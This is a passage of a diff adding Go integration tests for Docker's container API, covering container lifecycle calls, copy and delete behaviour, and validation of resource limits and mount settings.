"Name": "on-failure", + "MaximumRetryCount": 0 + } + } + }` + + res, _, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) +} + +// Issue 7941 - test to make sure a "null" in JSON is just ignored. 
+// W/o this fix a null in JSON would be parsed into a string var as "null" +func (s *DockerSuite) TestContainerAPIPostCreateNull(c *check.C) { + config := `{ + "Hostname":"", + "Domainname":"", + "Memory":0, + "MemorySwap":0, + "CpuShares":0, + "Cpuset":null, + "AttachStdin":true, + "AttachStdout":true, + "AttachStderr":true, + "ExposedPorts":{}, + "Tty":true, + "OpenStdin":true, + "StdinOnce":true, + "Env":[], + "Cmd":"ls", + "Image":"busybox", + "Volumes":{}, + "WorkingDir":"", + "Entrypoint":null, + "NetworkDisabled":false, + "OnBuild":null}` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + type createResp struct { + ID string + } + var container createResp + c.Assert(json.Unmarshal(b, &container), checker.IsNil) + out := inspectField(c, container.ID, "HostConfig.CpusetCpus") + c.Assert(out, checker.Equals, "") + + outMemory := inspectField(c, container.ID, "HostConfig.Memory") + c.Assert(outMemory, checker.Equals, "0") + outMemorySwap := inspectField(c, container.ID, "HostConfig.MemorySwap") + c.Assert(outMemorySwap, checker.Equals, "0") +} + +func (s *DockerSuite) TestCreateWithTooLowMemoryLimit(c *check.C) { + // TODO Windows: Port once memory is supported + testRequires(c, DaemonIsLinux) + config := `{ + "Image": "busybox", + "Cmd": "ls", + "OpenStdin": true, + "CpuShares": 100, + "Memory": 524287 + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + b, err2 := readBody(body) + c.Assert(err2, checker.IsNil) + + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB") +} + +func (s *DockerSuite) TestContainerAPIRename(c *check.C) { + out, _ := 
dockerCmd(c, "run", "--name", "TestContainerAPIRename", "-d", "busybox", "sh") + + containerID := strings.TrimSpace(out) + newName := "TestContainerAPIRenameNew" + statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/rename?name="+newName, nil) + c.Assert(err, checker.IsNil) + // 204 No Content is expected, not 200 + c.Assert(statusCode, checker.Equals, http.StatusNoContent) + + name := inspectField(c, containerID, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container")) +} + +func (s *DockerSuite) TestContainerAPIKill(c *check.C) { + name := "test-api-kill" + runSleepingContainer(c, "-i", "--name", name) + + status, _, err := sockRequest("POST", "/containers/"+name+"/kill", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + state := inspectField(c, name, "State.Running") + c.Assert(state, checker.Equals, "false", check.Commentf("got wrong State from container %s: %q", name, state)) +} + +func (s *DockerSuite) TestContainerAPIRestart(c *check.C) { + name := "test-api-restart" + runSleepingContainer(c, "-di", "--name", name) + + status, _, err := sockRequest("POST", "/containers/"+name+"/restart?t=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(name, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second), checker.IsNil) +} + +func (s *DockerSuite) TestContainerAPIRestartNotimeoutParam(c *check.C) { + name := "test-api-restart-no-timeout-param" + out, _ := runSleepingContainer(c, "-di", "--name", name) + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + status, _, err := sockRequest("POST", "/containers/"+name+"/restart", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(name, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second), checker.IsNil) +} + +func (s 
*DockerSuite) TestContainerAPIStart(c *check.C) { + name := "testing-start" + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), + "OpenStdin": true, + } + + status, _, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + // second call to start should give 304 + status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + c.Assert(err, checker.IsNil) + + // TODO(tibor): figure out why this doesn't work on windows + if isLocalDaemon { + c.Assert(status, checker.Equals, http.StatusNotModified) + } +} + +func (s *DockerSuite) TestContainerAPIStop(c *check.C) { + name := "test-api-stop" + runSleepingContainer(c, "-i", "--name", name) + + status, _, err := sockRequest("POST", "/containers/"+name+"/stop?t=30", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(name, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) + + // second call to start should give 304 + status, _, err = sockRequest("POST", "/containers/"+name+"/stop?t=30", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotModified) +} + +func (s *DockerSuite) TestContainerAPIWait(c *check.C) { + name := "test-api-wait" + + sleepCmd := "/bin/sleep" + if daemonPlatform == "windows" { + sleepCmd = "sleep" + } + dockerCmd(c, "run", "--name", name, "busybox", sleepCmd, "2") + + status, body, err := sockRequest("POST", "/containers/"+name+"/wait", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(waitInspect(name, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) + + var waitres 
containertypes.ContainerWaitOKBody + c.Assert(json.Unmarshal(body, &waitres), checker.IsNil) + c.Assert(waitres.StatusCode, checker.Equals, int64(0)) +} + +func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) { + name := "test-container-api-copy" + dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt") + + postData := types.CopyConfig{ + Resource: "/test.txt", + } + + status, _, err := sockRequest("POST", "/containers/"+name+"/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) +} + +func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + name := "test-container-api-copy" + dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt") + + postData := types.CopyConfig{ + Resource: "/test.txt", + } + + status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + found := false + for tarReader := tar.NewReader(bytes.NewReader(body)); ; { + h, err := tarReader.Next() + if err != nil { + if err == io.EOF { + break + } + c.Fatal(err) + } + if h.Name == "test.txt" { + found = true + break + } + } + c.Assert(found, checker.True) +} + +func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + name := "test-container-api-copy-resource-empty" + dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt") + + postData := types.CopyConfig{ + Resource: "", + } + + status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(string(body), checker.Matches, "Path cannot be empty\n") +} + +func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C) { + 
testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + name := "test-container-api-copy-resource-not-found" + dockerCmd(c, "run", "--name", name, "busybox") + + postData := types.CopyConfig{ + Resource: "/notexist", + } + + status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(string(body), checker.Matches, "Could not find the file /notexist in container "+name+"\n") +} + +func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + postData := types.CopyConfig{ + Resource: "/something", + } + + status, _, err := sockRequest("POST", "/v1.23/containers/notexists/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) +} + +func (s *DockerSuite) TestContainerAPIDelete(c *check.C) { + out, _ := runSleepingContainer(c) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + dockerCmd(c, "stop", id) + + status, _, err := sockRequest("DELETE", "/containers/"+id, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) +} + +func (s *DockerSuite) TestContainerAPIDeleteNotExist(c *check.C) { + status, body, err := sockRequest("DELETE", "/containers/doesnotexist", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) + c.Assert(getErrorMessage(c, body), checker.Matches, "No such container: doesnotexist") +} + +func (s *DockerSuite) TestContainerAPIDeleteForce(c *check.C) { + out, _ := runSleepingContainer(c) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + status, _, err := sockRequest("DELETE", "/containers/"+id+"?force=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) +} + +func (s *DockerSuite) 
TestContainerAPIDeleteRemoveLinks(c *check.C) { + // Windows does not support links + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--name", "tlink1", "busybox", "top") + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + out, _ = dockerCmd(c, "run", "--link", "tlink1:tlink1", "--name", "tlink2", "-d", "busybox", "top") + + id2 := strings.TrimSpace(out) + c.Assert(waitRun(id2), checker.IsNil) + + links := inspectFieldJSON(c, id2, "HostConfig.Links") + c.Assert(links, checker.Equals, "[\"/tlink1:/tlink2/tlink1\"]", check.Commentf("expected to have links between containers")) + + status, b, err := sockRequest("DELETE", "/containers/tlink2/tlink1?link=1", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNoContent, check.Commentf(string(b))) + + linksPostRm := inspectFieldJSON(c, id2, "HostConfig.Links") + c.Assert(linksPostRm, checker.Equals, "null", check.Commentf("call to api deleteContainer links should have removed the specified links")) +} + +func (s *DockerSuite) TestContainerAPIDeleteConflict(c *check.C) { + out, _ := runSleepingContainer(c) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + status, _, err := sockRequest("DELETE", "/containers/"+id, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusConflict) +} + +func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) { + testRequires(c, SameHostDaemon) + + vol := "/testvolume" + if daemonPlatform == "windows" { + vol = `c:\testvolume` + } + + out, _ := runSleepingContainer(c, "-v", vol) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + source, err := inspectMountSourceField(id, vol) + _, err = os.Stat(source) + c.Assert(err, checker.IsNil) + + status, _, err := sockRequest("DELETE", "/containers/"+id+"?v=1&force=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + _, err = os.Stat(source) + 
c.Assert(os.IsNotExist(err), checker.True, check.Commentf("expected to get ErrNotExist error, got %v", err)) +} + +// Regression test for https://github.com/docker/docker/issues/6231 +func (s *DockerSuite) TestContainerAPIChunkedEncoding(c *check.C) { + conn, err := sockConn(time.Duration(10*time.Second), "") + c.Assert(err, checker.IsNil) + client := httputil.NewClientConn(conn, nil) + defer client.Close() + + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), + "OpenStdin": true, + } + b, err := json.Marshal(config) + c.Assert(err, checker.IsNil) + + req, err := http.NewRequest("POST", "/containers/create", bytes.NewBuffer(b)) + c.Assert(err, checker.IsNil) + req.Header.Set("Content-Type", "application/json") + // This is a cheat to make the http request do chunked encoding + // Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite + // https://golang.org/src/pkg/net/http/request.go?s=11980:12172 + req.ContentLength = -1 + + resp, err := client.Do(req) + c.Assert(err, checker.IsNil, check.Commentf("error creating container with chunked encoding")) + resp.Body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusCreated) +} + +func (s *DockerSuite) TestContainerAPIPostContainerStop(c *check.C) { + out, _ := runSleepingContainer(c) + + containerID := strings.TrimSpace(out) + c.Assert(waitRun(containerID), checker.IsNil) + + statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/stop", nil) + c.Assert(err, checker.IsNil) + // 204 No Content is expected, not 200 + c.Assert(statusCode, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(containerID, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) +} + +// #14170 +func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *check.C) { + config := struct { + Image string + Entrypoint string + Cmd []string + }{"busybox", "echo", 
[]string{"hello", "world"}} + _, _, err := sockRequest("POST", "/containers/create?name=echotest", config) + c.Assert(err, checker.IsNil) + out, _ := dockerCmd(c, "start", "-a", "echotest") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") + + config2 := struct { + Image string + Entrypoint []string + Cmd []string + }{"busybox", []string{"echo"}, []string{"hello", "world"}} + _, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2) + c.Assert(err, checker.IsNil) + out, _ = dockerCmd(c, "start", "-a", "echotest2") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") +} + +// #14170 +func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCmd(c *check.C) { + config := struct { + Image string + Entrypoint string + Cmd string + }{"busybox", "echo", "hello world"} + _, _, err := sockRequest("POST", "/containers/create?name=echotest", config) + c.Assert(err, checker.IsNil) + out, _ := dockerCmd(c, "start", "-a", "echotest") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") + + config2 := struct { + Image string + Cmd []string + }{"busybox", []string{"echo", "hello", "world"}} + _, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2) + c.Assert(err, checker.IsNil) + out, _ = dockerCmd(c, "start", "-a", "echotest2") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") +} + +// regression #14318 +func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCapAddDrop(c *check.C) { + // Windows doesn't support CapAdd/CapDrop + testRequires(c, DaemonIsLinux) + config := struct { + Image string + CapAdd string + CapDrop string + }{"busybox", "NET_ADMIN", "SYS_ADMIN"} + status, _, err := sockRequest("POST", "/containers/create?name=capaddtest0", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + config2 := struct { + Image string + CapAdd []string + CapDrop []string + }{"busybox", []string{"NET_ADMIN", "SYS_ADMIN"}, 
[]string{"SETGID"}} + status, _, err = sockRequest("POST", "/containers/create?name=capaddtest1", config2) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) +} + +// #14915 +func (s *DockerSuite) TestContainerAPICreateNoHostConfig118(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only support 1.25 or later + config := struct { + Image string + }{"busybox"} + status, _, err := sockRequest("POST", "/v1.18/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) +} + +// Ensure an error occurs when you have a container read-only rootfs but you +// extract an archive to a symlink in a writable volume which points to a +// directory outside of the volume. +func (s *DockerSuite) TestPutContainerArchiveErrSymlinkInVolumeToReadOnlyRootfs(c *check.C) { + // Windows does not support read-only rootfs + // Requires local volume mount bind. + // --read-only + userns has remount issues + testRequires(c, SameHostDaemon, NotUserNamespace, DaemonIsLinux) + + testVol := getTestDir(c, "test-put-container-archive-err-symlink-in-volume-to-read-only-rootfs-") + defer os.RemoveAll(testVol) + + makeTestContentInDir(c, testVol) + + cID := makeTestContainer(c, testContainerOptions{ + readOnly: true, + volumes: defaultVolumes(testVol), // Our bind mount is at /vol2 + }) + defer deleteContainer(cID) + + // Attempt to extract to a symlink in the volume which points to a + // directory outside the volume. This should cause an error because the + // rootfs is read-only. 
+ query := make(url.Values, 1) + query.Set("path", "/vol2/symlinkToAbsDir") + urlPath := fmt.Sprintf("/v1.20/containers/%s/archive?%s", cID, query.Encode()) + + statusCode, body, err := sockRequest("PUT", urlPath, nil) + c.Assert(err, checker.IsNil) + + if !isCpCannotCopyReadOnly(fmt.Errorf(string(body))) { + c.Fatalf("expected ErrContainerRootfsReadonly error, but got %d: %s", statusCode, string(body)) + } +} + +func (s *DockerSuite) TestContainerAPIGetContainersJSONEmpty(c *check.C) { + status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(string(body), checker.Equals, "[]\n") +} + +func (s *DockerSuite) TestPostContainersCreateWithWrongCpusetValues(c *check.C) { + // Not supported on Windows + testRequires(c, DaemonIsLinux) + + c1 := struct { + Image string + CpusetCpus string + }{"busybox", "1-42,,"} + name := "wrong-cpuset-cpus" + status, body, err := sockRequest("POST", "/containers/create?name="+name, c1) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + expected := "Invalid value 1-42,, for cpuset cpus" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) + + c2 := struct { + Image string + CpusetMems string + }{"busybox", "42-3,1--"} + name = "wrong-cpuset-mems" + status, body, err = sockRequest("POST", "/containers/create?name="+name, c2) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + expected = "Invalid value 42-3,1-- for cpuset mems" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) +} + +func (s *DockerSuite) TestPostContainersCreateShmSizeNegative(c *check.C) { + // ShmSize is not supported on Windows + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "HostConfig": map[string]interface{}{"ShmSize": -1}, + } + + status, body, err := sockRequest("POST", "/containers/create", 
config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + c.Assert(getErrorMessage(c, body), checker.Contains, "SHM size can not be less than 0") +} + +func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check.C) { + // ShmSize is not supported on Windows + testRequires(c, DaemonIsLinux) + var defaultSHMSize int64 = 67108864 + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": "mount", + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), check.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + + c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, defaultSHMSize) + + out, _ := dockerCmd(c, "start", "-i", containerJSON.ID) + shmRegexp := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`) + if !shmRegexp.MatchString(out) { + c.Fatalf("Expected shm of 64MB in mount command, got %v", out) + } +} + +func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) { + // ShmSize is not supported on Windows + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "HostConfig": map[string]interface{}{}, + "Cmd": "mount", + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), check.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, 
check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + + c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(67108864)) + + out, _ := dockerCmd(c, "start", "-i", containerJSON.ID) + shmRegexp := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`) + if !shmRegexp.MatchString(out) { + c.Fatalf("Expected shm of 64MB in mount command, got %v", out) + } +} + +func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) { + // ShmSize is not supported on Windows + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": "mount", + "HostConfig": map[string]interface{}{"ShmSize": 1073741824}, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), check.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + + c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(1073741824)) + + out, _ := dockerCmd(c, "start", "-i", containerJSON.ID) + shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=1048576k`) + if !shmRegex.MatchString(out) { + c.Fatalf("Expected shm of 1GB in mount command, got %v", out) + } +} + +func (s *DockerSuite) TestPostContainersCreateMemorySwappinessHostConfigOmitted(c *check.C) { + // Swappiness is not supported on Windows + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + 
c.Assert(status, check.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), check.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + + c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1)) +} + +// check validation is done daemon side and not only in cli +func (s *DockerSuite) TestPostContainersCreateWithOomScoreAdjInvalidRange(c *check.C) { + // OomScoreAdj is not supported on Windows + testRequires(c, DaemonIsLinux) + + config := struct { + Image string + OomScoreAdj int + }{"busybox", 1001} + name := "oomscoreadj-over" + status, b, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + + expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]" + msg := getErrorMessage(c, b) + if !strings.Contains(msg, expected) { + c.Fatalf("Expected output to contain %q, got %q", expected, msg) + } + + config = struct { + Image string + OomScoreAdj int + }{"busybox", -1001} + name = "oomscoreadj-low" + status, b, err = sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]" + msg = getErrorMessage(c, b) + if !strings.Contains(msg, expected) { + c.Fatalf("Expected output to contain %q, got %q", expected, msg) + } +} + +// test case for #22210 where an empty container name caused panic. 
+func (s *DockerSuite) TestContainerAPIDeleteWithEmptyName(c *check.C) { + status, out, err := sockRequest("DELETE", "/containers/", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + c.Assert(string(out), checker.Contains, "No container name or ID supplied") +} + +func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) { + // Problematic on Windows as Windows does not support stats + testRequires(c, DaemonIsLinux) + + name := "testing-network-disabled" + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"top"}, + "NetworkDisabled": true, + } + + status, _, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + c.Assert(waitRun(name), check.IsNil) + + type b struct { + status int + body []byte + err error + } + bc := make(chan b, 1) + go func() { + status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) + bc <- b{status, body, err} + }() + + // allow some time to stream the stats from the container + time.Sleep(4 * time.Second) + dockerCmd(c, "rm", "-f", name) + + // collect the results from the stats stream or timeout and fail + // if the stream was not disconnected. 
+ select { + case <-time.After(2 * time.Second): + c.Fatal("stream was not closed after container was removed") + case sr := <-bc: + c.Assert(sr.err, checker.IsNil) + c.Assert(sr.status, checker.Equals, http.StatusOK) + + // decode only one object from the stream + var s *types.Stats + dec := json.NewDecoder(bytes.NewBuffer(sr.body)) + c.Assert(dec.Decode(&s), checker.IsNil) + } +} + +func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) { + type m mounttypes.Mount + type hc struct{ Mounts []m } + type cfg struct { + Image string + HostConfig hc + } + type testCase struct { + config cfg + status int + msg string + } + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + destPath := prefix + slash + "foo" + notExistPath := prefix + slash + "notexist" + + cases := []testCase{ + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "notreal", + Target: destPath}}}}, + status: http.StatusBadRequest, + msg: "mount type unknown", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind"}}}}, + status: http.StatusBadRequest, + msg: "Target must not be empty", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind", + Target: destPath}}}}, + status: http.StatusBadRequest, + msg: "Source must not be empty", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind", + Source: notExistPath, + Target: destPath}}}}, + status: http.StatusBadRequest, + msg: "bind source path does not exist", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "volume"}}}}, + status: http.StatusBadRequest, + msg: "Target must not be empty", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "volume", + Source: "hello", + Target: destPath}}}}, + status: http.StatusCreated, + msg: "", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: 
"volume", + Source: "hello2", + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{ + Name: "local"}}}}}}, + status: http.StatusCreated, + msg: "", + }, + } + + if SameHostDaemon.Condition() { + tmpDir, err := ioutils.TempDir("", "test-mounts-api") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + cases = append(cases, []testCase{ + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind", + Source: tmpDir, + Target: destPath}}}}, + status: http.StatusCreated, + msg: "", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "bind", + Source: tmpDir, + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{}}}}}, + status: http.StatusBadRequest, + msg: "VolumeOptions must not be specified", + }, + }...) + } + + if DaemonIsLinux.Condition() { + cases = append(cases, []testCase{ + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "volume", + Source: "hello3", + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{ + Name: "local", + Options: map[string]string{"o": "size=1"}}}}}}}, + status: http.StatusCreated, + msg: "", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "tmpfs", + Target: destPath}}}}, + status: http.StatusCreated, + msg: "", + }, + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "tmpfs", + Target: destPath, + TmpfsOptions: &mounttypes.TmpfsOptions{ + SizeBytes: 4096 * 1024, + Mode: 0700, + }}}}}, + status: http.StatusCreated, + msg: "", + }, + + { + config: cfg{ + Image: "busybox", + HostConfig: hc{ + Mounts: []m{{ + Type: "tmpfs", + Source: "/shouldnotbespecified", + Target: destPath}}}}, + status: http.StatusBadRequest, + msg: "Source must not be specified", + }, + }...) 
+ + } + + for i, x := range cases { + c.Logf("case %d", i) + status, b, err := sockRequest("POST", "/containers/create", x.config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, x.status, check.Commentf("%s\n%v", string(b), cases[i].config)) + if len(x.msg) > 0 { + c.Assert(string(b), checker.Contains, x.msg, check.Commentf("%v", cases[i].config)) + } + } +} + +func (s *DockerSuite) TestContainerAPICreateMountsBindRead(c *check.C) { + testRequires(c, NotUserNamespace, SameHostDaemon) + // also with data in the host side + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + destPath := prefix + slash + "foo" + tmpDir, err := ioutil.TempDir("", "test-mounts-api-bind") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + err = ioutil.WriteFile(filepath.Join(tmpDir, "bar"), []byte("hello"), 666) + c.Assert(err, checker.IsNil) + + data := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"/bin/sh", "-c", "cat /foo/bar"}, + "HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{{"Type": "bind", "Source": tmpDir, "Target": 